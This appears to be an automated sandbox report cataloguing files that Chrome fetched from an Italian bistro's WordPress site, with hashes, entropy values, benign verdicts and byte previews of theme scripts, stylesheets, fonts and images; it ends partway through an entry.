                                                                                                                                              Preview:wOF2......h...........hq.........................R..D..2.`..`..\.8..F.....8.....N...`.6.$.... ..`..&..V.....m..XFB.7.N.}..%lW.n...N........@.B.....b.1F.Q....o....!....)K.Ji.s.M.:..S..U.%..E]...`/..D.DC..F.7l...IHK1=.6.......A...[_.&4.K.jZ..Lu..{..f.et..c..I...e....;.-M*..GY.8"l......./.....#.C...C%..*..._.8.r..zu.......:tP..N..c:.>\...qK"........e...l.%.!.>..e.G.^56..KJ_..[A!dX:.@.aK.....w...4.....Kr.......Z..B....P(P(..../.)f.N.8L..&L......?...:....p.W....(...^*p..T....=.sgf...B)gA(.x.7.[9..T&PeI.T,0K....3.OZ..%.#z.z.._..t.j.+.j.......u.f0.$....lZ.Uw#?c.k.....H...g#../..Z.~z..x.....T..P.~Q.0..L.=.#....8....An.l.\a..gQ...o.O".9"E.Q.............Xv....~.../.?...Y}.-.O......9_._.d....)...7.J...V.........a.1L5....q...k.v.m..6..U`Q9....V.........z.wc.....l_._..}.)!....n........Pg.;0...m..s.7~J.M......V.4T|..v..\C$...~.c.A].)$.:..D..5....n0..c...W.0.....o_.o.o.B.!!o...s....ron....Rz.<.....0..)$.. q.#........UV.>IGi}P.a<.a.e.._I>8.$;~......P.]......
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):3864
                                                                                                                                              Entropy (8bit):4.962924804401647
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:4LZp5F4bvvjXbOjxlHSWIJtxFGLiCtTR2Kv37glKqiF4OeMdRvINkRYqudc:4dpr2HjMpSKiMZ/vbegCkRMc
                                                                                                                                              MD5:EA40DA6F432E4734DB0A33A43A99BAA5
                                                                                                                                              SHA1:2A70C56824004A64A5D93951816C1BE7B083AF69
                                                                                                                                              SHA-256:2A4D4F70113757B77CEDB59D9DE65C76BE8CA829B7CBB4359489AFD1EDEF4A53
                                                                                                                                              SHA-512:37D6690193C21D6BCABAEB23F5DA7785579ADC237F201938279AA82C02A91CFCCB69C525E64CB3FA77AAE5000C2A92C05A8B0695AF8C0A5D911A297BFA00A64E
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/framework/js/conditional_load/avia_google_maps_front.js?ver=4.5
                                                                                                                                              Preview:/* . * This file holds javascript functions needed in frontend for the functionallity of the Google Maps widgets and shortcodes. * Handles conditional loading of Google API script.. *. * @author..Christian "Kriesi" Budschedl. * @copyright.Copyright ( c ) Christian Budschedl. * @link..http://kriesi.at. * @link..http://aviathemes.com. * @since..Version 1.0. * @package .AviaFramework. * . */.."use strict";../**. * Avia Google Maps in frontend. */.(function($).{..var objAviaGoogleMaps = null;....var AviaGoogleMaps = function(){......if( 'undefined' == typeof window.av_google_map || 'undefined' == typeof avia_framework_globals )...{....return;...}......if( objAviaGoogleMaps != null )...{....return;...}......objAviaGoogleMaps = this;......this.document = $( document );...this.script_loading = false;...this.script_loaded = false;...this.script_source = avia_framework_globals.gmap_avia_api;...this.maps = {};...this.loading_icon_html = '<div class="ajax_load"><span class="ajax_load_inner"></spa
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (310)
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):2938
                                                                                                                                              Entropy (8bit):5.074446683447722
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:uLkpRhA3j2j5RJijbwYXi+zr2vZiMhie1WOAviAZJnupilIASA3DJDfQATfZpBQg:JjAqjhknwDt1WttEaztJDZp0Mda7Q
                                                                                                                                              MD5:4A67BEDDA5B0C5A3FF09B25C3174087B
                                                                                                                                              SHA1:444BBE9A4F07B07ECADED91C3A83404FCD99FFDF
                                                                                                                                              SHA-256:3836438097C8DFA0A82C58CE10D3AA507984C8FE27A1786B35C00CC67C2B22A5
                                                                                                                                              SHA-512:2636792EFC58AF112AFD295A0486CE1A3726204EF8BF5A50DDA63E0242F25F7116BD8A55D122C5374BDE579A5A2FDF07EA06E1D828DA829E6C02B778D568BD8B
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/notification/notification.css?ver=6.0.9
                                                                                                                                              Preview:/* ======================================================================================================================================================.Message Box.====================================================================================================================================================== */....avia_message_box{.text-align: center;.position: relative;.border-color: #e1e1e1;.background-color: #f8f8f8;.clear: both;.margin:30px 0;.}..div .avia_message_box .avia_message_box_title{.background-color: rgba(0,0,0,0.05);.position: absolute;.top:0;.left:0;.padding:5px 20px;.font-size: 11px;.text-shadow: none;.}...avia_message_box_content{ font-size: 14px; text-transform: uppercase; font-weight:600;}..avia_message_box_icon{ position: relative; left: -0.5em; font-size: 1.3em;}..avia_message_box.avia-size-normal{ padding: 17px; }..avia_message_box.avia-size-large{ padding: 35px; }...avia_message_box.avia-color-green , .avia_message_box.avia-color-green a. {background-colo
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):43
                                                                                                                                              Entropy (8bit):2.7374910194847146
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:CU9yltxlHh/:m/
                                                                                                                                              MD5:DF3E567D6F16D040326C7A0EA29A4F41
                                                                                                                                              SHA1:EA7DF583983133B62712B5E73BFFBCD45CC53736
                                                                                                                                              SHA-256:548F2D6F4D0D820C6C5FFBEFFCBD7F0E73193E2932EEFE542ACCC84762DEEC87
                                                                                                                                              SHA-512:B2CA25A3311DC42942E046EB1A27038B71D689925B7D6B3EBB4D7CD2C7B9A0C7DE3D10175790AC060DC3F8ACF3C1708C336626BE06879097F4D0ECAA7F567041
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):289
                                                                                                                                              Entropy (8bit):5.045022750980313
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:tI9mc4sltj4JacMDMwlRtuuHWqlqRt94yzXlqRtCx+vFjlC:t43Q6MwR3xgqsVg/5I
                                                                                                                                              MD5:1D72A5DEC3ACD073763570E3E5FDF784
                                                                                                                                              SHA1:25ECFF80EB26EF79709AB7278EB3991AC8CC2734
                                                                                                                                              SHA-256:9FA88118818D9B64838F578E2BABCCA3D0630AED21B5C33B34AFF7AC5CE506BC
                                                                                                                                              SHA-512:DEE0B0CAE09B07705091CD7371F40650D09FB1FBD736E60FA2716679A660B515A0C74BDFCDB5A9D32A178870A14697010B018C417CE30402F5FFA42C8B8384A2
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" id="flag-icons-it" viewBox="0 0 640 480">. <g fill-rule="evenodd" stroke-width="1pt">. <path fill="#fff" d="M0 0h640v480H0z"/>. <path fill="#009246" d="M0 0h213.3v480H0z"/>. <path fill="#ce2b37" d="M426.7 0H640v480H426.7z"/>. </g>.</svg>.
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:PNG image data, 75 x 75, 8-bit/color RGB, non-interlaced
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):25358
                                                                                                                                              Entropy (8bit):5.006278877714235
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:lJN9NvO3tM5sSo72OlJYlRbVu+R48HAm/hh+:XN9Nv4tXX7v09uM4mr6
                                                                                                                                              MD5:35F6EF9958F82B885739F7321990C682
                                                                                                                                              SHA1:8822B7B4F49C075851B682FC086B370414206F7F
                                                                                                                                              SHA-256:1D08E51346D47A73D485A1C9858885D6B2D67B89ACDF61717675DE2545E9F21F
                                                                                                                                              SHA-512:67F8F5ED0A615847253B15C70FAA5022BC6EA8CDF7AE84389D1A032FB0DB98BD846E9FE04151D821EBA50DE21B6ED724B438D8321465923F6C7165843C59B51F
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:.PNG........IHDR...K...K......,.....pHYs.................iCCPPhotoshop ICC profile..x..wT.Y.......-!.RBo....k...FH ...B.......X...eDFD... cA,X..{..AE]..6T....{v..=g.s.9..{........Nr.R1...-..b...I.)l.. .......\.ott8...p.....6\.T..[...sy.H4...sy...1...'....$.0^*......`..S..-...Lr=.0.&............D.re...].`...r..'....E.....x.\>.M........h..`..O>...LSzr..%O......Q.T.].....+..0...P....$..&kI..%i.QS,.O......!.S...O.b>7 l..Y.S.M...9qS,[.....#....%....Nq.(.3....)..%DNqnVl......S.({..)g.....K...Q.....G...#..)}......J=7/VyV..S....i.h.."..<y.29.....r.H ..}.Rq:.#...b;...$%..'......@XW...N....D0.q..N<.`|.........)dy.......P.&h.>.....8...@ .B..A2,...!.d...`..C)l..P......!8.mp...E..}p......K...0. ...#.D.1@L.k..qE..@$..A..TD.H..R..CJ.2...4"."'...e....."#.[....4...f.l...E..8t!*@s.|...V.u.A..=.^Eo...Kt.....0C..s...(,...d.*.....f....n`..+.3..c..8.........rp.p.qU...V.y... n...O.....x.>././...+..............E0'..B..L...F..B....O."...Dm.5..E....b.N.A...u.0...J2 9..H)$.i-..t.t.t
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):29
                                                                                                                                              Entropy (8bit):3.9353986674667634
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                              MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                              SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                              SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                              SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.google.com/async/newtab_promos
                                                                                                                                              Preview:)]}'.{"update":{"promos":{}}}
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 52648, version 1.0
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):52648
                                                                                                                                              Entropy (8bit):7.996033428788516
                                                                                                                                              Encrypted:true
                                                                                                                                              SSDEEP:1536:9eBlxzWRUJTVGP5v267Q1Sk+S2/D8l+8O2:9maeeP5v267Q7w8z
                                                                                                                                              MD5:657E828FB3A5963706E24CBF9D711BB8
                                                                                                                                              SHA1:84C08557D977E0A46EC8941B2D84235069DAB229
                                                                                                                                              SHA-256:45E39853C41558C4922FF1B0895547A99E378F136EC3D9D2F4DF15CC269485FA
                                                                                                                                              SHA-512:EEBEDF24A2516B860FFA2C9241474157604F8FC2EDC9E3BF3C0A0DDDF3168519F13FC195D48D232ED8F4A5DB1C48EF0563D62B2E2BDCF55F936CBD319AB18E16
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://use.fontawesome.com/releases/v5.0.0/webfonts/fa-brands-400.woff2
                                                                                                                                              Preview:wOF2.............r....V.........................T.V..f...h..X.6.$..|..... ..*..m[.#qB.......*...v......@(B...............1......T+.....d.2OaAf.j.....b.>.........?2|/F...PR*J4[ &..b....E......../...q..4`M*D.c...-|.a.q.b..h..m..4....... ..N...?B....k.?.Ja.F7=....u|....zx..z..L.....ht......:w.-.P..!...Yh..q.=..'aP[........ .d.u......D65...,.HD.6..........8..4...(...V.........Q..../...8@.+J.B*..I.L........N...sn.n............&.5.rC0.nc,.X...".0r......D.."*F.6........b..._.....q$.c.[.y......../.0..#..$,.?..P......_...J..&...).c^.do...;~.....^...K...........7.[...BN..I.o.8.....{.....K.I#....~w._[e..... ..C@.n*.qd.....]T..Im.....';...."Y.,S$.I.N...6....m.!...;...2.m9E.\..d.=.W...{...S.#...y$T...]G...Bdp^.#.B....@a];.Q}....._.f..Y.I-....!9...].F/a.[.^..0..VMw..@..]...[.......-.~....U..)m....fc..N..-..iI.l]........u.{..k.y....+)X-.+p.V<.19.q.u8...T....n"..u....~..lIj.\..l....Pa$.$....i.....4%.....k.....e...\l9d..d...R.ij..NHRP:..>...s`.|
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):221
                                                                                                                                              Entropy (8bit):4.954190859494583
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:tI9mc4sltj4Jdi/gRtXRDq5uRtuuHWeXYb5uRtdo7chg2:t43ccgf2uf3rkufqwP
                                                                                                                                              MD5:F685765A298DB5BA59FDDFA6DE08020E
                                                                                                                                              SHA1:26A13C58EB6166DC9688C4EF53290539FDC135AD
                                                                                                                                              SHA-256:54B194D90DE3E6F979A8AE032FEC2A246291724B5F14B8578C186D81B1FA65B4
                                                                                                                                              SHA-512:143BCB315D8AF83D8AFB0E834F77C4A84D4F2065887A9063CDF7F8F1FF143E0F30F8DAD2D56EC7E247EADB6DE8225E9F54BDA699F1C21C2CA507088BA5B3285B
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" id="flag-icons-nl" viewBox="0 0 640 480">. <path fill="#21468b" d="M0 0h640v480H0z"/>. <path fill="#fff" d="M0 0h640v320H0z"/>. <path fill="#ae1c28" d="M0 0h640v160H0z"/>.</svg>.
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):2974
                                                                                                                                              Entropy (8bit):4.954218561225648
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:eUT6SIp7kVrXKkVrOAkVrdpT1tGoLa0u5azvF6jiJTVfXII0mIUwQk6D820W8DC5:nkpkL/aJNg0u5arFTZA0rDgWmo
                                                                                                                                              MD5:024313E08099EEB557F7C03CE4B3EE82
                                                                                                                                              SHA1:DE3653E75740ECED4EF4D8D7BDB8613A2C1038FF
                                                                                                                                              SHA-256:0F074F370473A437A345467CD13A2E090520221E3340B1253959FEFB587B89C5
                                                                                                                                              SHA-512:B5BC1D4C1484F927ABA0B08919E602E14462014CB90AFF43AF8D895172F4DB712B3EB0C3429735EE2B123CF1B314A9AF117EEE9FF2EBCCC58020ED4607DAEBAF
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/numbers/numbers.js?ver=6.0.9
                                                                                                                                              Preview:// -------------------------------------------------------------------------------------------.// Big Number animation shortcode javascript.// -------------------------------------------------------------------------------------------..(function($).{..// options.simple_up = dont prepend leading zeros, options.instant_start = trigger counting instantly, options.start_timer = delay when to start counting..$.fn.avia_sc_animated_number = function(options) ..{...if(!this.length) return;...if(this.is('.avia_sc_animated_number_active')) return;......this.addClass('avia_sc_animated_number_active');.....var skipStep = false,....simple_upcount .= (options && options.simple_up) ? true : false,....start_timer .= (options && options.start_timer) ? options.start_timer : 300,...start_count = function(element, countTo, increment, current, fakeCountTo)...{............//calculate the new number....var newCount = current + increment;........//if the number is bigger than our final number set the number a
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:PNG image data, 124 x 156, 8-bit/color RGBA, non-interlaced
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):7879
                                                                                                                                              Entropy (8bit):7.948490500677716
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:Y+P712lKFZObVtJcK4/Yhtkj2ihnj2lqHeZM4kNthMHB:Uld0UYZD+ZDkNjqB
                                                                                                                                              MD5:5C8AED765367D33266DB9F6F9851B171
                                                                                                                                              SHA1:7B64F52297E7720E4C1151B6C68496FC26985AA2
                                                                                                                                              SHA-256:2D2DB7745F05880F243117B05C91BA05911538833CE77C1BF7D7CB93CBE515D1
                                                                                                                                              SHA-512:FB90E0996558C1764697308967097481A06E14A4FEF906EABA6AFBB02ACDD49E66AC587A6366A93374C76183659C6EE0AAC7B160CA846C70C2E1A42628CEAF48
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/uploads/2021/06/CiPASSO-Bistrot-Roma-userci.png
                                                                                                                                              Preview:.PNG........IHDR...|..........Z.<....iCCPsRGB IEC61966-2.1..(.u..K.A....G...-,,.DAP..A...FA-b..6.yI.\<..$.....h..@[.Z..E.;.Z.F.9.."bf..o..3..3.T4....T..........B5n..5.....x...y...=v....5..j*...Qt#-<!<...m..nQ..e.3.nC.(|g....../..F(8..&aO..G...04ay9^-.Q..._R...f%...a.$.....1..~.e.......L~_>..U.Ud..b.B..i.E.HuUbLtUF.....}5c....u~.z....pmCn...,+w..Op.*.....[%.{...p~U..p....z...qg,.o.P.....],.........ao.:.|...d.g.k-......pHYs..=...=....t....IDATx..yt[..?..%..'v.MY a..J..R*...(...M.Y..0.SM.9..2.Li{JKK....J.i...6J).%@ .=.8$N...l..x.?....8.,.$s....Y.......r..w...... @....... @....... @....... @....... @....... @..Q...H..3.~..=................o..Q......3.8...J.J....&...{.@.y.0......@1"....f...../...~9..2.(X.....3.C...@3"..8j.;...y..h7.ND.y...#.{.g7.7.......2........_.....^GD.~X..|.......h......F..i.s...?....4......7.|#0.x..1.[.U.+........5...{....$....*.....v....z.4F9"......X......7..._.,@.....N..k3i0.q..D.y..2`90.I..$........%..<w!M....d.>.L.>.l.....Gx4.
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):16
                                                                                                                                              Entropy (8bit):3.75
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:HVq/okY:tkY
                                                                                                                                              MD5:DA179036872D95CE66254A075850921F
                                                                                                                                              SHA1:E3784EF23BE40234A00FA9B535BCADFC3C5DE8CC
                                                                                                                                              SHA-256:7603C9039F23CD47C4AA2F0AAEC265CCCA49EF2DC87144721A928D8EECDB973B
                                                                                                                                              SHA-512:0FFDB440CEAEE2058200FF259CBED2E697A5FD15F6CA21DBDFC60BD05DD9EA3D34B6FF739F082219CF3924C57A770F2B88D04D2D2CEC41835D62D4C8934DEB06
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAlbcWpcYnwliRIFDbI5fEI=?alt=proto
                                                                                                                                              Preview:CgkKBw2yOXxCGgA=
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):8442
                                                                                                                                              Entropy (8bit):4.883712838949273
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:GIWPKhYRU1hU0+Z9BQR4hqcwsUEVqUWAGITIRMLRRMKHKQnhL65b1pZ1nH91rQ7b:mPooU7UbZ9BZNQE2PLavLJJqvH7cv
                                                                                                                                              MD5:D796060840929B29AF732AB67485068A
                                                                                                                                              SHA1:BD4A5D4D0AD834B5AC95D95FEF448E070BBDDFE5
                                                                                                                                              SHA-256:729B2AEEB7C20E1A31A624DCF851D7CFE83551465820417D5531880C81FBFBED
                                                                                                                                              SHA-512:93490925D406B6CA471E074BCC3B62833B218280BF63835B2723DAE61F126527D325998954605872690373B38CF1C111E19400E1BFC269AF087909DF232C3820
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:(function($).{.."use strict";.// -------------------------------------------------------------------------------------------.// Aviaccordion Slideshow .// .// accordion slider script.// -------------------------------------------------------------------------------------------...$.AviaccordionSlider = function(options, slider)..{.. this.$slider .= $( slider );.. this.$inner. .= this.$slider.find('.aviaccordion-inner');.. this.$slides.= this.$inner.find('.aviaccordion-slide');.. this.$images.= this.$inner.find('.aviaccordion-image');.. this.$last..= this.$slides.filter(':last');.. this.$titles .= this.$slider.find('.aviaccordion-preview');.. this.$titlePos = this.$slider.find('.aviaccordion-preview-title-pos');.. this.$titleWrap = this.$slider.find('.aviaccordion-preview-title-wrap');.. this.$win. .= $( window );.. .. if($.avia_utilities.supported.transition === undefined)...{....$.avia_utilities.supported.transition = $.avia_utilities.supports('t
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):4907
                                                                                                                                              Entropy (8bit):4.8971761437029535
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:8p4bkPVguMB/5F+vhT49gTlQnOb1wXq+E52fHhrZ7BZI/13:8pouM5+vhT49gdb1wXqj5GE/13
                                                                                                                                              MD5:C646E2118F0A221134028E1C39EC2442
                                                                                                                                              SHA1:312417FB33B9C1D9E902BE3994E69E79F21872FF
                                                                                                                                              SHA-256:0BA37342832476B32564B738A6278F765C1B0D13D486BCB062E764B10FE8788D
                                                                                                                                              SHA-512:1C9B4A36730DBDAFB88DC1AB09B890AEB9A66AC18F734494392371C225CD28EA372D0216AB855E9C4E87C9080FFB7434C03E7DAD39E02299DAB8EE14DE72FB8F
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_layerslider/slideshow_layerslider.css?ver=6.0.9
                                                                                                                                              Preview:/* ======================================================================================================================================================.Layer Slider.====================================================================================================================================================== */.div .avia-layerslider .ls-fullwidth .ls-nav-sides,.div .avia-layerslider .ls-fullwidth .ls-bottom-slidebuttons a,.div .avia-layerslider .ls-fullwidth .ls-nav-prev,.div .avia-layerslider .ls-fullwidth .ls-nav-next,.div .avia-layerslider .ls-fullwidth .ls-nav-start,.div .avia-layerslider .ls-fullwidth .ls-nav-stop,.div .avia-layerslider .ls-fullwidth .ls-fullscreen,.div .avia-layerslider .ls-fullwidth .ls-loading-container,.div .avia-layerslider .ls-noskin .ls-loading-container,.div .avia-layerslider .ls-noskin .ls-fullscreen {..background-image: none;.}.....avia-layerslider .ls-container.ls-fullwidth{.margin-bottom:0 !important;.}...avia-layerslider{.border-top-style: sol
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):5081
                                                                                                                                              Entropy (8bit):4.872155066547225
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:Z75kJMEEWSH4zC1t3+bMkNG5jOOhZ9rU4prcV2fGURJf8:KAH4zC1U/NG5jO4Zi4prZf8
                                                                                                                                              MD5:8284F1A53A88616626271EA58FF8700C
                                                                                                                                              SHA1:3351D77F4D01733C00A5C2F7ECC89C571D3E36A8
                                                                                                                                              SHA-256:46E51E0E7D593FD1EA59775973395AF361FA164473C0E1CE8CF606A0CC684C60
                                                                                                                                              SHA-512:5B8A93A31C55BA7941BE152D58DD5537F9716574266A9B5FA3B34440387E35AB4B2B111B4D7C659B5258DD919C2EAB73A0DCC5744DE03A7865D0B80347B7191B
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:// -------------------------------------------------------------------------------------------.// Horizontal Gallery.// -------------------------------------------------------------------------------------------..(function($).{ .."use strict";...$.fn.avia_hor_gallery= function(options)..{...var defaults =....{.....slide_container.: '.av-horizontal-gallery-inner', //element with max width.....slide_element.: '.av-horizontal-gallery-slider', //element that gets moved.....slide_content.: '.av-horizontal-gallery-wrap',.....active...: 'av-active-gal-item',....// must be a class string without the . in front.....prev...: '.av-horizontal-gallery-prev',.....next...: '.av-horizontal-gallery-next'....};.....var options = $.extend(defaults, options);......var win ...= $(window),....browserPrefix .= $.avia_utilities.supports('transition'),....cssActive ..= this.browserPrefix !== false ? true : false,....isMobile ..= $.avia_utilities.isMobile,....transform3d..= document.documentElement.className.in
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1417
                                                                                                                                              Entropy (8bit):7.7706275313897875
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:Viv6dalvho05f9I1gig+jG6PiU/JY6eLXQSiwPOoLbazXIZlLKuAPWtsBt2JHLzq:VivEa7o051ISeiUB7er/iw9azXgLpYC6
                                                                                                                                              MD5:62516D09C4FE66BD76DAAF35E1160199
                                                                                                                                              SHA1:A02F864EDC91B2AF3AFEFCEF2B422BE952659E14
                                                                                                                                              SHA-256:E69155C97C7718620DD76B32E1C722B8126349049936385B5CD8A484B40B2432
                                                                                                                                              SHA-512:4CEE2BC045452261824BBF2C820398BF6D9A64BE9566B08CBA639A658691C2AAD0DFFA57D8C52CA096EFD45CDCB106BBDACE1EA2FCA2E48113A568FA5CF50CB3
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:.PNG........IHDR... ... .....szz....PIDATX...k.U..?3.Iws.6..&.........6. ]..,..*B..._].._.._...E....C.%EQ...Uk.....f.to.;>..t:......r...}.............I ....@.H..@.....7.<..[.....si..<`....@.p....Ek@..'.....k......T.k.#.....I....lg2.p;.........o.y...6./._.s.!.v..Bf.....`.(..|.m...........v.X.s.8+#....k..E....+....|........"......[.~.......{.+@..x..E.Z..P.........,...L.\$.......W....#..J.%....W...oE..&......\...t..$.L.s.V.....\n.].XX.>/..e;.s.K...:`..Cj.owH'...u..........Rd.s.ax.p............'5.43..,=...I.y.V.`.(..9.h.......;eeB>.....f-<..R..Nb@.....d..e....W..k.x...D{.W..;......8'....&."iV .tM.J...~.eMrv[_..0=..V....N....%..[*?..N......G.Z8.c........T.0S....kW'.k3Si<....{...[..R.|..=.-.O...L.2<V..@ .....,.k.c..Z.......bg."..-....9....>.^......w..l&..^..._..G...U.r.F.|F .rAJ1~E....O.g..4f.`g3....M..<.r...l..|.|.....E..|!0.%...p..R.5*A...<.....?+.....h.......E...p.....s....z.h.N]a....7&.v...U..R..1.....B.....@...wN..B.~-..J...s.........76....T..7
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 240x240, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=9, manufacturer=FUJIFILM, model=X-S10, xresolution=138, yresolution=146, resolutionunit=2, software=Adobe Photoshop Lightroom Classic 13.4 (Windows), datetime=2024:07:26 14:18:03], baseline, precision 8, 1500x630, components 3
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):1019783
                                                                                                                                              Entropy (8bit):7.9803975392161215
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24576:LXOcBLmxXHIKQLbJ4gO0q4DNHWfnBikVdj4:LTAHmq+q4hH+YkVC
                                                                                                                                              MD5:028411E9FD93E1611117FCC8D54A7748
                                                                                                                                              SHA1:773EE4E28A7750E05CE2A15AEA927F734493B8D7
                                                                                                                                              SHA-256:A4EA5F523316D455B2703B8C18519C84842DED59C7EC962E14101B6C550AA23A
                                                                                                                                              SHA-512:D1A41BA1EB6F438836963FA821AF9C71604F4E1BBCF55EFB34F2DC2747B38BC29182E0FDB01F73DCC18272408B66DE8699A9FC720F8720EE0C373A0B0518F1D1
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/uploads/2024/08/Vini-italiani-eccellenti-1500x630.jpg
                                                                                                                                              Preview:......JFIF............).Exif..II*...............z.......................................(...........1...1.......2...........;...........i...............FUJIFILM..X-S10.................Adobe Photoshop Lightroom Classic 13.4 (Windows)..2024:07:26 14:18:03.YOUGENIO..'........................."...........'...........0...................0232............................................................................................$...........,...........4...............................................<.......................D...........L.............................................................................................../.......................................1.......T...2.......^...3.......~...4...........5...................2...........2024:07:17 18:14:00.2024:07:17 18:14:00.+02:00..+01:00..+01:00..P.V.@B..............d.......d...,...d...N...d...d.......d.......1D000530......d...|...d.......d.......d...FUJIFILM..XF18-55mmF2.8-4 R LM OIS..1CC10160................................
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):1178
                                                                                                                                              Entropy (8bit):4.466350213184545
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:eN0qZ2hcB7G1B8up8GzeSFJtQvX6MSqc69sDYL:eN0ogmueHyJeXF9SYL
                                                                                                                                              MD5:69F11D7D576F136EE22049A9D2E01B9A
                                                                                                                                              SHA1:651A4C6FFD9C0C8D289218B4A6BD1AE1AC5B2502
